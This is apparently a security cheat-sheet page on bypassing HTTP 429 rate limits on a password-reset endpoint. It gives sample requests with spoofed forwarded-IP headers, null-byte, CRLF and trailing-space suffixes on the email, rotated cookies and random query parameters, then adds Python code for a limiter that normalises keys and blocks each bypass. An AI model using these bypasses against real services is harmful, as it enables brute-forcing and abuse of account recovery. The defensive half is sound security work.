# 429 Bypass (Too Many Requests)

## Custom Header

```
# Try adding custom headers
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
```

```
# Try this to bypass
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
...

[email protected]
```

Appending a null byte (`%00`) or a tab/CRLF character (`%09`, `%0d`, `%0a`) to the end of the email can bypass the rate limit, because the limiter buckets on the raw value while the application still matches the same account.

```
POST /ForgotPass.php HTTP/1.1
Host: target.com
...

[email protected]%00
```

## Try changing user-agents, cookies and IP address

```
# Normal Request (429)
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
...

[email protected]
```

```
# Try this to bypass (200)
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
...

[email protected]
```

## Add a random parameter on the last endpoint

```
# Normal Request (429)
POST /ForgotPass.php HTTP/1.1
Host: target.com
...

[email protected]
```

```
# Try this to bypass (200)
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
...

[email protected]
```

## Add space after the parameter value

```
# Normal Request (429)
POST /api/forgotpass HTTP/1.1
Host: target.com
...

{"email":"[email protected]"}
```

```
# Try this to bypass (200)
POST /api/forgotpass HTTP/1.1
Host: target.com
...

{"email":"[email protected] "}
```
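Every technique on this page works for the same reason: the limiter derives its bucket key from something the client controls (a forwarded-IP header, a cookie, the query string, or the un-normalised email). The Python below is an added example, not code from this page or from any project it describes; it builds the rate-limit key from attributes the client cannot vary (method plus path only, the address vouched for by a trusted proxy, and a canonicalised email) and replays each of the page's bypass requests against a sliding-window limiter to confirm they all stay in the original bucket. The trusted-proxy address, the client address and the email are constructed for the demo.

```python
import re
import unicodedata
from collections import defaultdict, deque
from urllib.parse import urlsplit

# Constructed for this example: reverse proxies whose X-Forwarded-For we trust.
TRUSTED_PROXIES = {"10.0.0.5"}

# NUL, TAB, CR, LF and other C0/DEL control characters that the page's
# %00 / %09 / %0d / %0a suffixes decode to.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def client_ip(peer_ip: str, headers: dict) -> str:
    """Address to rate-limit on.

    X-Forwarded-For is honoured only when the TCP peer is a trusted proxy,
    and then only its last element (the one that proxy appended) is used.
    X-Client-IP, X-Remote-IP, X-Host and friends are never consulted.
    """
    if peer_ip in TRUSTED_PROXIES:
        hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",")]
        hops = [h for h in hops if h]
        if hops:
            return hops[-1]
    return peer_ip


def canonical_email(raw: str) -> str:
    """Map 'a@b.com', 'a@b.com\\x00', 'a@b.com ' and 'A@B.COM' to one key."""
    s = unicodedata.normalize("NFKC", raw)
    s = CONTROL_CHARS.sub("", s)
    return s.strip().lower()


def canonical_route(method: str, target: str) -> str:
    """Key on method + path only, so '?random' cannot open a new bucket."""
    path = urlsplit(target).path.rstrip("/") or "/"
    return f"{method.upper()} {path}"


def rate_limit_key(method, target, peer_ip, headers, email):
    # Cookies and User-Agent are deliberately absent from the key.
    return (canonical_route(method, target),
            client_ip(peer_ip, headers),
            canonical_email(email))


class SlidingWindowLimiter:
    """Allow at most `limit` hits per key in any `window`-second span."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self._hits = defaultdict(deque)

    def allow(self, key, now: float) -> bool:
        q = self._hits[key]
        while q and q[0] <= now - self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def replay_page_scenarios(limit: int = 3):
    """Exhaust the bucket, then send each bypass variant from the page."""
    limiter = SlidingWindowLimiter(limit=limit, window=60.0)
    peer, email = "203.0.113.7", "user@example.com"   # constructed values
    base = dict(method="POST", target="/ForgotPass.php",
                peer_ip=peer, headers={}, email=email)
    baseline = [200 if limiter.allow(rate_limit_key(**base), now=float(i)) else 429
                for i in range(limit + 1)]
    variants = {
        "custom_header": dict(base, headers={"x-forwarded-for": "127.0.0.1",
                                             "x-client-ip": "127.0.0.1"}),
        "null_byte": dict(base, email=email + "\x00"),
        "crlf": dict(base, email=email + "\r\n"),
        "new_cookie_and_ua": dict(base, headers={"cookie": "aaaaaaaaaaaaa",
                                                 "user-agent": "other"}),
        "random_param": dict(base, target="/ForgotPass.php?random"),
        "trailing_space": dict(base, email=email + " "),
    }
    outcomes = {name: (200 if limiter.allow(rate_limit_key(**req), now=10.0) else 429)
                for name, req in variants.items()}
    return baseline, outcomes


if __name__ == "__main__":
    print(replay_page_scenarios())
```

The key design choice is that the limiter normalises on its own, rather than trusting the application's parser to do it later: the page's `%00` and trailing-space variants succeed precisely when the limiter sees the raw string while the account lookup sees the cleaned one. Honouring `X-Forwarded-For` only from a known proxy, and only its last hop, is what makes the custom-header section harmless; if no trusted proxy sits in front of the service, the peer address alone should be used.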